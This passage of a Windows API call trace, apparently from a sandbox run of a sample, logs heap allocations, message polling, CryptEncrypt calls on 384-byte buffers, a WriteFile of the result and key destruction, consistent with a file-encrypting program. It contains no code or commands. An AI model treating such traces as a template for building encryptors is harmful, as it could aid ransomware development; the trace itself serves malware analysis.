hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71d38 | out: hHeap=0x2af0000) returned 1 [0224.237] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2aab4b8 [0224.237] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x40) returned 0x2a73bc0 [0224.237] PeekMessageW (in: lpMsg=0x8ced58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ced58) returned 0 [0224.237] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71d38 [0224.237] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71c98 [0224.237] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab650 [0224.237] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab458 [0224.237] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71c38 [0224.237] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab668 [0224.237] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71c38 | out: hHeap=0x2af0000) returned 1 [0224.237] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71d68 [0224.237] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a78110 [0224.237] CharUpperBuffW (in: lpsz="SSA1A0070620F", cchLength=0xd | out: lpsz="SSA1A0070620F") returned 0xd [0224.237] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a78110 | out: hHeap=0x2af0000) returned 1 [0224.237] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71d68 | out: hHeap=0x2af0000) returned 1 [0224.237] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab668 | out: hHeap=0x2af0000) returned 1 [0224.238] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x38) returned 0x2a5e980 [0224.238] PeekMessageW (in: lpMsg=0x8ced58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ced58) returned 0 [0224.238] PeekMessageW (in: lpMsg=0x8ced58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ced58) returned 0 [0224.238] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71bb8 [0224.238] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71c88 [0224.238] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab458 [0224.238] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab668 [0224.238] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71d98 [0224.238] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab710 [0224.238] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0224.238] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0224.238] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a781d8 [0224.238] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71ba8 [0224.238] CharUpperBuffW (in: lpsz="A5C00800A45", cchLength=0xb | out: lpsz="A5C00800A45") returned 0xb [0224.238] PeekMessageW (in: lpMsg=0x8ceef8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceef8) returned 0 [0224.238] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71c68 [0224.238] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71ca8 [0224.238] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab668 [0224.238] CharUpperBuffW (in: lpsz="SSA5C00800A45", cchLength=0xd | out: lpsz="SSA5C00800A45") returned 0xd [0224.238] PeekMessageW (in: lpMsg=0x8ceef8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceef8) returned 0 [0224.238] PeekMessageW (in: lpMsg=0x8ceef8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceef8) returned 0 [0224.238] PeekMessageW (in: lpMsg=0x8ceef8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceef8) returned 0 [0224.239] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0224.239] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0224.239] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0224.239] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0224.239] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0224.239] CharUpperBuffW (in: lpsz="A4F00A00447", cchLength=0xb | out: lpsz="A4F00A00447") returned 0xb [0224.239] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0224.239] CharUpperBuffW (in: lpsz="SSA4F00A00447", cchLength=0xd | out: lpsz="SSA4F00A00447") returned 0xd [0224.239] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0224.239] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0224.239] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0224.239] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptEncrypt", cchWideChar=13, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0224.239] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptEncrypt", cchWideChar=13, lpMultiByteStr=0x2aab8f0, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptEncrypt", lpUsedDefaultChar=0x0) returned 13 [0224.239] CryptEncrypt (in: hKey=0x9e2138, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x8cef60*=0x17c, dwBufLen=0x0 | out: pbData=0x0*, pdwDataLen=0x8cef60*=0x180) returned 1 [0224.239] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0224.240] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0224.240] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0224.240] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0224.240] CharLowerBuffW (in: lpsz="byte[384]", cchLength=0x9 | out: lpsz="byte[384]") returned 0x9 [0224.240] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0224.240] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0224.240] CharUpperBuffW (in: lpsz="A4F00A00447", cchLength=0xb | out: lpsz="A4F00A00447") returned 0xb [0224.240] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0224.240] CharUpperBuffW (in: lpsz="SSA4F00A00447", cchLength=0xd | out: lpsz="SSA4F00A00447") returned 0xd [0224.240] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0224.240] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0224.240] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0224.240] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptEncrypt", cchWideChar=13, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0224.240] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptEncrypt", cchWideChar=13, lpMultiByteStr=0x2aab950, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptEncrypt", lpUsedDefaultChar=0x0) returned 13 [0224.240] CryptEncrypt (in: hKey=0x9e2138, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x50e04e0*, pdwDataLen=0x8cef60*=0x17c, dwBufLen=0x180 | out: pbData=0x50e04e0*, pdwDataLen=0x8cef60*=0x180) returned 1 [0224.240] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0224.240] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0224.240] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0224.240] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0224.240] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0224.240] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0224.241] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0224.241] CharUpperBuffW (in: lpsz="A170020032E", cchLength=0xb | out: lpsz="A170020032E") returned 0xb [0224.241] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0224.241] CharUpperBuffW (in: lpsz="SSA170020032E", cchLength=0xd | out: lpsz="SSA170020032E") returned 0xd [0224.241] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0224.241] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0224.241] CharUpperBuffW (in: lpsz="A0000901A0E", cchLength=0xb | out: lpsz="A0000901A0E") returned 0xb [0224.241] PeekMessageW (in: lpMsg=0x8ceef8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceef8) returned 0 [0224.241] CharUpperBuffW (in: lpsz="SSA0000901A0E", cchLength=0xd | out: lpsz="SSA0000901A0E") returned 0xd [0224.241] PeekMessageW (in: lpMsg=0x8ceef8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceef8) returned 0 [0224.241] PeekMessageW (in: lpMsg=0x8ceef8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceef8) returned 0 [0224.241] PeekMessageW (in: lpMsg=0x8ceef8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceef8) returned 0 [0224.241] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0224.241] CharUpperBuffW (in: lpsz="A1A0070620F", cchLength=0xb | out: lpsz="A1A0070620F") returned 0xb [0224.241] PeekMessageW (in: lpMsg=0x8ced58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ced58) returned 0 [0224.241] CharUpperBuffW (in: lpsz="SSA1A0070620F", cchLength=0xd | out: lpsz="SSA1A0070620F") returned 0xd [0224.241] PeekMessageW (in: lpMsg=0x8ced58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ced58) returned 0 [0224.241] PeekMessageW (in: lpMsg=0x8ced58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ced58) returned 0 [0224.247] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0224.247] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0224.247] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0224.247] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0224.247] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0224.247] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0224.247] WriteFile (in: hFile=0x4e0, lpBuffer=0x50e0c88*, nNumberOfBytesToWrite=0x180, lpNumberOfBytesWritten=0x8cf5e4, lpOverlapped=0x0 | out: lpBuffer=0x50e0c88*, lpNumberOfBytesWritten=0x8cf5e4*=0x180, lpOverlapped=0x0) returned 1 [0224.248] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0224.248] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0224.248] CharUpperBuffW (in: lpsz="A4D00401A22", cchLength=0xb | out: lpsz="A4D00401A22") returned 0xb [0224.248] PeekMessageW (in: lpMsg=0x8cf3a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3a0) returned 0 [0224.248] CharUpperBuffW (in: lpsz="SSA4D00401A22", cchLength=0xd | out: lpsz="SSA4D00401A22") returned 0xd [0224.248] PeekMessageW (in: lpMsg=0x8cf3a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3a0) returned 0 [0224.248] PeekMessageW (in: lpMsg=0x8cf3a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3a0) returned 0 [0224.248] CharUpperBuffW (in: lpsz="A4F00A00447", cchLength=0xb | out: lpsz="A4F00A00447") returned 0xb [0224.249] PeekMessageW (in: lpMsg=0x8cedb0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cedb0) returned 0 [0224.249] CharUpperBuffW (in: lpsz="SSA4F00A00447", cchLength=0xd | out: lpsz="SSA4F00A00447") returned 0xd [0224.249] PeekMessageW (in: lpMsg=0x8cedb0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cedb0) returned 0 [0224.249] PeekMessageW (in: lpMsg=0x8cedb0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cedb0) returned 0 [0224.249] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0224.249] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDestroyKey", cchWideChar=16, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 16 [0224.249] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDestroyKey", cchWideChar=16, lpMultiByteStr=0x2aab560, cbMultiByte=16, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptDestroyKey", lpUsedDefaultChar=0x0) returned 16 [0224.249] CryptDestroyKey (hKey=0x9e2138) returned 1 [0224.249] PeekMessageW (in: lpMsg=0x8cf3a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3a0) returned 0 [0224.249] PeekMessageW (in: lpMsg=0x8cf3a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3a0) returned 0 [0224.249] CharUpperBuffW (in: lpsz="A170020032E", cchLength=0xb | out: lpsz="A170020032E") returned 0xb [0224.249] PeekMessageW (in: lpMsg=0x8cf140, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf140) returned 0 [0224.249] CharUpperBuffW (in: lpsz="SSA170020032E", cchLength=0xd | out: lpsz="SSA170020032E") returned 0xd [0224.249] PeekMessageW (in: lpMsg=0x8cf140, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf140) returned 0 [0224.249] PeekMessageW (in: lpMsg=0x8cf140, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf140) returned 0 [0224.249] CharUpperBuffW (in: lpsz="A0000901A0E", cchLength=0xb | out: lpsz="A0000901A0E") returned 0xb [0224.249] PeekMessageW (in: lpMsg=0x8ceee0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceee0) returned 0 [0224.249] CharUpperBuffW (in: lpsz="SSA0000901A0E", cchLength=0xd | out: lpsz="SSA0000901A0E") returned 0xd [0224.249] PeekMessageW (in: lpMsg=0x8ceee0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceee0) returned 0 [0224.249] PeekMessageW (in: lpMsg=0x8ceee0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceee0) returned 0 [0224.249] PeekMessageW (in: lpMsg=0x8ceee0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceee0) returned 0 [0224.249] PeekMessageW (in: lpMsg=0x8cf140, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf140) returned 0 [0224.250] CharUpperBuffW (in: lpsz="A1A0070620F", cchLength=0xb | out: lpsz="A1A0070620F") returned 0xb [0224.250] PeekMessageW (in: lpMsg=0x8ced40, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ced40) returned 0 [0224.250] CharUpperBuffW (in: lpsz="SSA1A0070620F", cchLength=0xd | out: lpsz="SSA1A0070620F") returned 0xd [0224.250] PeekMessageW (in: lpMsg=0x8ced40, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ced40) returned 0 [0224.250] PeekMessageW (in: lpMsg=0x8ced40, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ced40) returned 0 [0224.250] PeekMessageW (in: lpMsg=0x8cf140, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf140) returned 0 [0224.250] PeekMessageW (in: lpMsg=0x8cf140, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf140) returned 0 [0224.250] PeekMessageW (in: lpMsg=0x8cf3a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3a0) returned 0 [0224.250] PeekMessageW (in: lpMsg=0x8cf3a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3a0) returned 0 [0224.250] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0224.250] CharUpperBuffW (in: lpsz="A170020032E", cchLength=0xb | out: lpsz="A170020032E") returned 0xb [0224.250] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0224.250] CharUpperBuffW (in: lpsz="SSA170020032E", cchLength=0xd | out: lpsz="SSA170020032E") returned 0xd [0224.250] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0224.250] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0224.250] CharUpperBuffW (in: lpsz="A0000901A0E", cchLength=0xb | out: lpsz="A0000901A0E") returned 0xb [0224.250] PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0224.250] CharUpperBuffW (in: lpsz="SSA0000901A0E", cchLength=0xd | out: lpsz="SSA0000901A0E") returned 0xd [0224.250] PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0224.250] PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0224.250] PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0224.250] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0224.250] CharUpperBuffW (in: lpsz="A1A0070620F", cchLength=0xb | out: lpsz="A1A0070620F") returned 0xb [0224.251] PeekMessageW (in: lpMsg=0x8cf0a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf0a8) returned 0 [0224.251] CharUpperBuffW (in: lpsz="SSA1A0070620F", cchLength=0xd | out: lpsz="SSA1A0070620F") returned 0xd [0224.251] PeekMessageW (in: lpMsg=0x8cf0a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf0a8) returned 0 [0224.251] PeekMessageW (in: lpMsg=0x8cf0a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf0a8) returned 0 [0224.251] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0224.251] CharUpperBuffW (in: lpsz="A4F00A00447", cchLength=0xb | out: lpsz="A4F00A00447") returned 0xb [0224.251] PeekMessageW (in: lpMsg=0x8cf138, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf138) returned 0 [0224.251] CharUpperBuffW (in: lpsz="SSA4F00A00447", cchLength=0xd | out: lpsz="SSA4F00A00447") returned 0xd [0224.251] PeekMessageW (in: lpMsg=0x8cf138, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf138) returned 0 [0224.251] PeekMessageW (in: lpMsg=0x8cf138, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf138) returned 0 [0224.251] CharUpperBuffW (in: lpsz="A2300C04232", cchLength=0xb | out: lpsz="A2300C04232") returned 0xb [0224.251] PeekMessageW (in: lpMsg=0x8cf138, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf138) returned 0 [0224.251] CharUpperBuffW (in: lpsz="SSA2300C04232", cchLength=0xd | out: lpsz="SSA2300C04232") returned 0xd [0224.251] PeekMessageW (in: lpMsg=0x8cf138, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf138) returned 0 [0224.251] PeekMessageW (in: lpMsg=0x8cf138, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf138) returned 0 [0224.251] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0224.251] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptReleaseContext", cchWideChar=20, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, 